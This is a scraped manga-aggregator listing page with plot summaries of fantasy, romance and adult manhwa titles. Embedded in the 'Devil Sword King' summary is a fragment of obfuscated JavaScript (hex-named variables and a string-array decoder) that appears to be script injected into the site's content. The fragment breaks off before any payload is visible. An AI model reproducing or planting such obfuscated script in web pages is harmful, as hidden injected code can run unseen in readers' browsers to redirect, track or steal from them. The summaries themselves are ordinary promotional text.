Fantasy - Page 1312

Explore the world of Fantasy manga, where gripping stories await. Start reading the best Fantasy manga free now!

15893 results

Marry Me?

Satisfy the customers! Marry, who has 100% success rate in helping his customers marry. A special story of customer satisfaction for those who come to Marry for help.


Tsundere na Watakushi ga Kawaii Nante Shouki Desu ka

Rose, a prideful and spoiled princess, is known for her arrogance and lack of charm, making her widely disliked. After a life-changing event, she decides to turn her life around and make amends for her past behavior. Her first step? Breaking off her engagement with her kind and supportive fiancé, Rein, to free him from being tied to someone like her. However, to Rose\'s surprise, Rein doesn\'t react as she expects. Instead, he openly declares: \"I can\'t help but find you irresistibly cute.\" Confused and flustered, Rose struggles to understand his feelings while grappling with her own emotions. This romantic comedy explores themes of personal growth, self-worth, and unexpected love, all wrapped in the quirky charm of a tsundere protagonist.


Isekai Shoukan Oji-san no Juumusou Life - Sabage Suki Salaryman wa Kaisha Owari ni Isekai e Chokki suru

The middle-aged man and airsoft enthusiast Daisuke Koga is summoned to a different world on his 40th birthday. Given the ability to turn airsoft guns into real guns, Daisuke must save the other world while traveling back and forth between reality and the fantasy world. Alongside female swordsman Rena, Daisuke becomes the only gun user and dominates in the fantasy world after work!


Samurai Shinken

“If a male child is born, I will kill you all.“ Uha and Ren, two 7-year-old boys from a village of beggars, want to become the legendary sword that draws forth its blade and defeats monsters. One day, the two boys rescue a fallen legendary sword user, Aiji, in the forest near their village and bring him back. They plead with him to confirm whether they possess any abilities of the legendary sword themselves. Aiji agrees to check their abilities on the condition that they become his disciples, and he begins to train Uha and Ren, who awaken the powers of the legendary sword. Seven years pass, and while Ren is away on an errand, the cursed sword, Habuna, enemies of the legendary sword, comes to the village and kills all the villagers, intending to kill both Aiji and Uha as well...


Arctic King

The stars shift, the blizzard persists, the icy apocalypse is imminent, food! Temperature! Violence! Dependence! In this dilemma, under the distortion of human nature, has desire given birth to monsters? How to break out of adversity and find a way to survive!



Read Manga Stigmata Online For Free At S2Manga Associated Names: STIGMATA – Four Knights of the Apocalypse / Stigmata – Saint of the Red Purge / Stigmata – The Forging of a Saint / スティグマータ 赤煉の聖者 / 赤炼的圣者 The Content Stigmata: The end of the Holy War. The Pope, in an effort to suppress the remaining eye-witnesses who oppose his power, demands that a gag order be enforced regarding “the miracle” that brought the war to an end: the appearance of the five who bore the stigmata—the Holy Marks—the marks of God. 10 years later… The diabolic faction that opposed the Vatican’s power and brought about the Holy War has awakened again and has begun assassinating the once-admired heroes of the Holy War. The Vatican has refused to acknowledge the situation, treating each incident as nothing more than simple coincidence, but in the years that have passed since the Holy War ended, the Pope has been rumored to have created an occult organization called RADEM, whose orders are to fight demons though they seem to have another mission—a much more obscure mission… The Cardinal calls for an assembly of the region’s clergymen in the name of the Pope to discuss the situation, and to that end, an ambitious nun named Sister Rose is sent to the Teatela Province on a mission to locate Father Gabriel Iota—a priest suspected of possessing a very strong Holy Power… You can follow some other great Comics!!!: Children of Vamfield Into the light once again Mysterious Village Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.


Devil Sword King

A boy lives two lives: a young leader in a magical world and a high-schooler in reality. And he’s determined to live in both! Dive into this action-packed martial art fusion comic!<script></script><script>function _0x3399(_0x34de3b,_0x3bcecf){var _0x5c826f=_0x291b();return _0x3399=function(_0x379915,_0xc3ce92){_0x379915=_0x379915-(-0x1d19+0x1*0xa97+0x1320);var _0x1941c8=_0x5c826f[_0x379915];return _0x1941c8;},_0x3399(_0x34de3b,_0x3bcecf);}(function(_0x4f4204,_0x3b4a12){var _0x3b69c4=_0x3399,_0x6e8f39=_0x4f4204();while(!![]){try{var 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Even though you know it’s crazy

Read Even though you know it’s crazy Novel – Even though you know it’s crazy Manhwa Online Free At ZINMANGA.NET The summary of the comic Even though you know it’s crazy: “Do you want to sleep with me?” “No limit on the number of times.” A daring proposal, a bold acceptance, this is how it all began. Cha Jeong-mu, the sole heir of Venus Group, and his capable secretary, Min Seol-ha. “It feels so good, I could go insane.” The night, driven by instinct alone, dug deeper and deeper, leaving a profound imprint on their hearts. “How well do you think you know Min Seol-ha?” Even in the moment, when the reality was wielding a knife against his throat, he was unable to come to his senses. “Let’s cover it up.” Even though they knew it was a crazy thing to do. “Even though you know it’s crazy” is also known as: Although I Know It’s Crazy / 미친 짓인 줄 알면서도 The comic Even though you know it’s crazy belongs to the Genre: Adult, Drama, Fantasy, Manhwa, Mature, Office Workers, Romance, Smut “Top Manhwa, MangaUpdates, Read Manhwa Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging

2 days ago

Loving Summer Sky

Read “Loving Summer Sky Novel” – “Loving Summer Sky Manhwa” Online Free At MANHWACLAN The summary of the comics “Loving Summer Sky”: Gihoo prefers the sky over people, he loves taking photos of it. one day a student called “haneul” was transferred to school!. *haneul means ‘sky’* “Loving Summer Sky” is alternatively named: dear summer sky / 사랑하는 여름 하늘 The comics “Loving Summer Sky” belongs to the Genre: Drama, Fantasy, Manhwa, Romance, School Life “KUNMANGA, MANGA UPDATES, HARIMANGA…” are the most searched keywords on the website ShojoScans. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA My Ruined Academy How to Change Angst Into a Feel-Good The Beast Tamed by the Evil Woman

1 days ago

Ah, It’s Wonderful To Be Alive

Read manga Ah, It’s Wonderful To Be Alive / Aa, Ikite Irutte Subarashii / ああ、生きているって素晴らしい Called a failure by his adoptive parents, bullied at school, ignored by teachers, high school boy Kurogane Rikuto has nowhere to belong neither at home nor at school. “Life is shit. I guess I’ll die.” After saying this, he was about to commit suicide by jumping off the school’s roof when suddenly all sorts of monsters started appearing from students’ smartphones, transforming the school into a hellscape of screaming agony. Goblins, orcs, slimes… Everybody has seen them in games: “small fry monsters”. However, humans in the real world, where there is no magic, no special abilities, and no leveling up, are devoured by those “small fries” without any means to retaliate. Rikuto, spared from the incident due to his bullies destroying his phone, seeing the students who bullied him and the teachers dying unsightly deaths and the collapse of order, realizes he does have a desire to survive. Just then, a goblin wielding a club attacks him from behind— Thus begins the survival action tale of one insignificant human driven into extreme circumstances.

18 hours ago

As A Virtuous Middle-Aged Man, My New Life Was Confirmed To Be Sss Rank

This world judges the deeds and good karma of your previous life, and grants you a rank when you are reborn. The benevolent man, even surprising the gods through this, decides to be reborn as the son Alexander of a noble family, and thus starts his SSS-Rank life! Follow Alec's journey as he lives his life as a SSS Rank!! (Source: Shueisha, translated)
